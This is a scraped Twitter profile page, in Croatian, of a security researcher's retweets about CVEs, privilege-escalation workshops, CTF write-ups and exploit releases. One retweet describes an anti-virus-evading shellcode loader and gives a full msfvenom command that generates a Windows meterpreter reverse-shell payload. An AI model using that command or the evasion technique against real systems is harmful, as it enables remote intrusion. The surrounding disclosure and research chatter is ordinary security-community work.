Berry Skyberg

@b1u3b3rr7

Independent Security Researcher

Vrijeme pridruživanja: ožujak 2017.

Tweetovi

Blokirali ste korisnika/cu @b1u3b3rr7

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @b1u3b3rr7

  1. proslijedio/la je Tweet
    29. sij

    Excited to start the new year with CVE-2020-3842 :) It's a fun one and unlike the other bugs I reported so far so I'm looking forward to (responsibly) disclosing it.

    Poništi
  2. proslijedio/la je Tweet
    30. sij
    Poništi
  3. proslijedio/la je Tweet
    26. sij

    Windows / Linux Local Privilege Escalation Workshop (Materials included !) 🥳

    Poništi
  4. proslijedio/la je Tweet
    1. velj
    Poništi
  5. proslijedio/la je Tweet
    31. sij

    Hardware Debugging for Reverse Engineers Part 1: SWD, OpenOCD and Xbox One Controllers Hope you enjoy! As always ping me with any questions

    Poništi
  6. proslijedio/la je Tweet
    1. velj
    Poništi
  7. proslijedio/la je Tweet
    1. velj

    Here is my writeup for Facebook's BountyCon 2020 CTF. Was not able to give much time but enjoyed solving a couple of challenges.🧑‍💻

    Prikaži ovu nit
    Poništi
  8. proslijedio/la je Tweet
    27. sij

    macOS/iOS: ImageIO: heap corruption when processing malformed TIFF image

    Poništi
  9. proslijedio/la je Tweet

    Wrote a scanner that can safely check if an RDP Gateway Server is vulnerable to CVE-2020-0609 or CVE-2020-0610. Time to see who has been keeping up with patching ;)

    Poništi
  10. proslijedio/la je Tweet
    13. sij

    I've been poking around the Windows kernel a lot lately and one of my favorite samples I've referenced is Mimikatz's driver, Mimidrv. I took some time and documented all of its functions and included some write-ups on important kernel structures. Post: 1/3

    Prikaži ovu nit
    Poništi
  11. proslijedio/la je Tweet
    4. sij

    I just need you all to know how much my VS Code theme slaps. I *finally* got the glow working 😍😍😍 Theme: Synthwave x Fluoromachine Font: Fira Code

    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    5. sij

    It's been a year since i released a full write-up of BattlEye's shellcode, so let's revisit those protection mechanisms and figure out what's changed :-)

    Prikaži ovu nit
    Poništi
  13. proslijedio/la je Tweet
    5. sij

    从内存中加载 SHELLCODE bypass AV查杀 This is a program to run shellcode as its own process, all from memory. This was written to defeat anti-virus detection. msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444

    Poništi
  14. proslijedio/la je Tweet
    6. sij

    -2019-12750: Symantec Endpoint Protection Local Privilege Escalation – Part 2

    Poništi
  15. proslijedio/la je Tweet
    4. sij

    Just wrote an article about how I found a new Remote Command Execution 0-day (CVE-2019-15029) in Pandora FMS v7.0NG monitoring software I Found it by performing a static code analysis and finally wrote a python exploit for it.

    Poništi
  16. proslijedio/la je Tweet
    4. sij
    Poništi
  17. proslijedio/la je Tweet
    3. sij

    Exploiting of Windows in the Wild!-Part 2 [ Reversing Part 2] by Nikhil Rathor

    Poništi
  18. proslijedio/la je Tweet
    3. sij

    Here is an exploit for LPE CVE-2019-1184 in case anybody else is interested in this cool bug:

    Poništi
  19. proslijedio/la je Tweet
    4. sij

    DropBox privilege escalation in Windows using hardlinks. Great read and great research by !

    Poništi
  20. proslijedio/la je Tweet

    Behold a hacker who, in 57 lines of code, replicated an $86 million license-plate-recognition system that the city of Victoria bought: Obvs caveats, as he notes: The $86 million project likely had regulatory requirements, etc. But still, yowsa

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·